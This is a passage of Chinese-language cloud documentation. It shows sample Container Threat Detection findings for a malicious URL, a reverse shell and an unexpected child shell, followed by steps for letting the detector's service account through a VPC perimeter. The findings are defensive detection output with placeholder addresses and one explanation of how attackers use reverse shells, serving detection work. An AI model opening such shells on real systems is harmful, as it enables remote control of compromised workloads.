                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
              },
              {
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
              },
              {
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
              },
              {
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
              },
              {
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
              },
              {
                "name": "\"PORT\"",
                "val": "\"8080\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"HOME\"",
                "val": "\"/root\""
              }
            ],
            "pid": "1"
          }
        ],
        "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      },
      "resource": {
        "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "display_name": "CLUSTER_ID",
        "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      },
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
          "/bin/echo",
          "https://testsafebrowsing.appspot.com/s/malware.html"
        ],
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        },
        "Environment_Variables": [
          "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=CONTAINER_NAME",
          "DEBIAN_FRONTEND=noninteractive",
          "LANG=C.UTF-8",
          "PYTHONUNBUFFERED=1",
          "PORT=8080",
          "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
          "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443",
          "HOME=/root"
        ],
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        },
        "Pod_Name": "CONTAINER_NAME"
      }
    }
  

反向 shell

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

意外的 Shell Shell

{
  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
            }
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER"
      ]
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/dash\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"SHLVL\"",
            "val": "\"1\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"PORT\"",
            "val": "\"8080\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"_\"",
            "val": "\"./temp/dash\""
          }
        ],
        "pid": "15",
        "parentPid": "14"
      },
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/consul\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/consul\""
        ],
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "Process_Arguments": [
      "./temp/dash"
    ],
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    },
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    },
    "Parent_Pid": 14,
    "Environment_Variables": [
      "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
      "KUBERNETES_PORT_443_TCP_PORT=443",
      "KUBERNETES_PORT=tcp://10.52.113.1:443",
      "PYTHONUNBUFFERED=1",
      "KUBERNETES_SERVICE_PORT=443",
      "KUBERNETES_SERVICE_HOST=10.52.113.1",
      "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "PWD=/home/vmagent/app",
      "LANG=C.UTF-8",
      "SHLVL=1",
      "HOME=/root",
      "KUBERNETES_PORT_443_TCP_PROTO=tcp",
      "KUBERNETES_SERVICE_PORT_HTTPS=443",
      "DEBIAN_FRONTEND=noninteractive",
      "PORT=8080",
      "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
      "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
      "_=./temp/dash"
    ]
  }
}
    

扫描受服务边界保护的项目

如果您在 2023 年 12 月 7 日之后在组织级层激活了 Security Command Center,并且您的服务边界阻止对某些项目和服务的访问,那么您必须向 Container Threat Detection 的服务账号授予对该服务边界的入站访问权限。否则,Container Threat Detection 将无法生成与受保护项目和服务相关的发现结果。

对于组织级激活,服务账号标识符是采用以下格式的电子邮件地址:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

在上例中,将 ORGANIZATION_ID 替换为组织的数字标识符。

如果您的集群位于 VPC Service Controls 服务边界内,请确保 containerthreatdetection.googleapis.com 这一 Container Threat Detection API 被列为可访问服务。如需了解详情,请参阅服务边界概览

如需向服务账号授予对服务边界的入站访问权限,请按以下步骤操作。

  1. 转到 VPC Service Controls。

    转到 VPC Service Controls

  2. 在工具栏中,选择您的 Google Cloud 组织。

    项目选择器

  3. 在下拉列表中,选择包含要授予访问权限的服务边界的访问权限政策。

    访问权限政策列表

    与访问权限政策关联的服务边界将显示在列表中。

  4. 点击服务边界的名称。

  5. 点击 修改边界

  6. 在导航菜单中,点击入站流量政策

  7. 点击添加规则

  8. 按如下方式配置规则:

    API 客户端的“来自于”特性

    1. 来源部分,选择所有来源
    2. 身份部分,选择选定的身份
    3. 添加用户/服务账号字段中,点击选择
    4. 输入服务账号电子邮件地址。 如果您同时拥有组织级层和项目级层服务账号,请同时添加这两个服务账号。
    5. 点击保存

    GCP 服务/资源的“至”特性

    1. 对于项目,选择所有项目

    2. 对于服务,请选择所有服务,或选择 Container Threat Detection 所需的以下各项服务:

      • Kubernetes Engine API

      如果服务边界限制对某项必需服务的访问,则 Container Threat Detection 无法为该服务生成发现结果。

    3. 在导航菜单中,点击保存

    如需了解详情,请参阅配置入站和出站政策

    后续步骤